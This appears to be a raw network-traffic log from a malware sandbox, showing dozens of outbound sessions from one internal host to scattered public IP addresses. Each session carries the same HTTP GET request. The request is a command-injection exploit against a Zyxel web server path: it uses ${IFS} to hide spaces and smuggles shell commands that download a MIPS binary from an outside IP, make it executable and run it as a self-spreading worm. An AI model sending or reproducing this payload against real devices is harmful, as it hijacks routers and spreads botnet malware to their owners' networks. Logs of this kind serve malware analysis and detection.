                                                Jan 12, 2024 18:16:14.227768898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2125192.168.2.2335040189.198.148.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227804899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2126192.168.2.2348272102.14.101.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227865934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2127192.168.2.2344218166.154.172.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227907896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2128192.168.2.2356586160.32.80.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227952003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2129192.168.2.235524462.138.155.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.227994919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2130192.168.2.234619662.3.139.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228013992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2131192.168.2.2360976112.242.244.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228085041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2132192.168.2.2341984112.204.195.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228135109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2133192.168.2.2348154200.70.141.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228199959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2134192.168.2.2338340112.33.5.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228233099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2135192.168.2.2356852137.48.46.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228266954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2136192.168.2.233571483.235.96.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228291035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2137192.168.2.234548082.169.206.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228324890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2138192.168.2.2357560131.62.137.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228375912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2139192.168.2.233551251.184.165.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228399992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2140192.168.2.2344454159.57.93.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228466988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2141192.168.2.235790480.116.134.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228502989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2142192.168.2.2342324167.54.123.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228557110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2143192.168.2.2337446194.55.241.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228585005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2144192.168.2.2336246123.30.34.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228646040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2145192.168.2.2344910216.39.29.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228688955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2146192.168.2.2349676150.89.238.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228738070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2147192.168.2.23450444.238.135.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228760958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2148192.168.2.2352680137.15.234.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228800058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2149192.168.2.2334642200.189.75.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228856087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2150192.168.2.235639480.41.149.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228899956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2151192.168.2.2357924190.135.217.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228929043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2152192.168.2.234836695.179.55.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.228964090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2153192.168.2.2342092130.59.7.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229007006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2154192.168.2.234630253.66.188.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229038000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2155192.168.2.2359464203.101.222.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229063034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2156192.168.2.2345162176.159.38.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229114056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2157192.168.2.2338184167.83.27.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229140043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2158192.168.2.234645483.105.187.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229183912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2159192.168.2.234000287.148.64.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229233027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2160192.168.2.235184236.157.32.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229258060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2161192.168.2.2332930190.0.225.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229285002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2162192.168.2.235998418.253.225.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229331970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2163192.168.2.2333218183.220.17.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229374886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2164192.168.2.2339000187.226.28.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229414940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2165192.168.2.2340406212.104.91.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229461908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2166192.168.2.2334820212.170.209.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229511023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2167192.168.2.235011694.225.243.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229532003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2168192.168.2.235394083.80.237.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229578018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2169192.168.2.234261223.174.187.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229619980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2170192.168.2.2338464113.114.253.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229659081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2171192.168.2.23328849.206.175.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229698896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2172192.168.2.2345854220.205.156.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229715109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2173192.168.2.2343300223.167.185.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229774952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2174192.168.2.235003623.85.107.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229816914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2175192.168.2.234579048.248.131.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229847908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2176192.168.2.234221298.166.66.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229872942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2177192.168.2.233446258.46.37.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229923964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2178192.168.2.2337818204.174.173.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229959011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2179192.168.2.233963023.89.47.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.229998112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2180192.168.2.2357380216.172.142.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230062962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2181192.168.2.2337012210.135.61.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230093956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2182192.168.2.233673044.196.182.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230125904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2183192.168.2.234263295.242.100.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230146885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2184192.168.2.2334182163.172.246.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230191946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2185192.168.2.2335936134.16.78.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230226994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2186192.168.2.235929843.163.89.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230283976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2187192.168.2.2347784108.86.189.22443
                                                TimestampBytes transferredDirectionData
